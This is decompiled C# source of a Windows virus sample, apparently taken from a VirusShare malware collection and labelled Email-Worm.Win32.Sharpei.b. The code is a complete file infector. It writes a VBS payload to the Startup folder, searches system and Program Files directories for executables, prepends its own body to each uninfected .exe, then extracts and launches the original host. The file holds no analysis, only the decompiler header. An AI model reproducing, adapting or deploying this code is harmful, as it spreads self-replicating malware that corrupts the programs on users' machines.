// Decompiled with JetBrains decompiler
// Type: Sharp.Sharp
// Assembly: Sharp, Version=1.0.786.1197, Culture=neutral, PublicKeyToken=null
// MVID: C5414447-1586-4206-9133-31D57E99CDF8
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.Win32.Sharpei.b-ba994d47dbed6b77d6a39746bae626cc7cace4153e6108ee5e22a375dc335b84.exe

using Microsoft.Win32;
using System;
using System.Diagnostics;
using System.IO;

namespace Sharp
{
  public class Sharp
  {
    private static string virname = (string) Registry.LocalMachine.OpenSubKey("Software\\Sharp").GetValue("");

    [STAThread]
    private static void Main()
    {
      StreamWriter text = new FileInfo(new DirectoryInfo(Environment.GetFolderPath(Environment.SpecialFolder.Startup)).FullName + "\\Sharp.vbs").CreateText();
      text.Write("MsgBox \"You're infected with Win32.HLLP.Sharp, written in C#, by Gigabyte/Metaphase\",64,\"title\"");
      text.Close();
      string fullName = new DirectoryInfo(Environment.SystemDirectory).Parent.FullName;
      string[] directories = Directory.GetDirectories(new DirectoryInfo(Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles)).FullName, "*.*");
      Sharp.Sharp.FileSearch(fullName);
      Sharp.Sharp.FileSearch(directories[11]);
      Sharp.Sharp.FileSearch(directories[12]);
      Sharp.Sharp.FileSearch(directories[13]);
      FileStream fileStream1 = new FileStream(Sharp.Sharp.virname, FileMode.Open, FileAccess.Read);
      FileStream fileStream2 = new FileStream("temp.exe", FileMode.OpenOrCreate);
      byte[] buffer = new byte[(int) checked ((uint) unchecked ((int) fileStream1.Length - 12288))];
      fileStream1.Seek(12288L, SeekOrigin.Begin);
      fileStream1.Read(buffer, 0, (int) fileStream1.Length - 12288);
      fileStream2.Write(buffer, 0, (int) fileStream1.Length - 12288);
      long length = fileStream2.Length;
      fileStream2.Close();
      if (length > 0L && !Sharp.Sharp.virname.EndsWith("MS02-010.exe"))
        new Process() { StartInfo = { FileName = "temp.exe" } }.Start();
      while (File.Exists("temp.exe"))
      {
        try
        {
          File.Delete("temp.exe");
        }
        catch
        {
        }
      }
    }

    private static void FileSearch(string DirectoryToCheck)
    {
      string[] files = Directory.GetFiles(DirectoryToCheck, "*.exe");
      int length = files.Length;
      for (int index = 0; index < length; ++index)
      {
        string str = files[index];
        FileStream fileStream1 = new FileStream(str, FileMode.Open, FileAccess.Read);
        fileStream1.Seek(18L, SeekOrigin.Begin);
        int num = fileStream1.ReadByte();
        fileStream1.Close();
        if (num != 103)
        {
          try
          {
            File.SetAttributes(str, FileAttributes.Normal);
            File.Copy(str, "hostcopy.exe", true);
            File.Copy(Sharp.Sharp.virname, str, true);
            FileStream fileStream2 = new FileStream("hostcopy.exe", FileMode.Open);
            FileStream fileStream3 = new FileStream(str, FileMode.Append);
            byte[] buffer = new byte[(int) checked ((uint) unchecked ((int) fileStream2.Length))];
            fileStream2.Read(buffer, 0, (int) fileStream2.Length);
            fileStream3.Write(buffer, 0, (int) fileStream2.Length);
            fileStream2.Close();
            fileStream3.Close();
          }
          catch
          {
          }
        }
      }
      File.Delete("hostcopy.exe");
    }
  }
}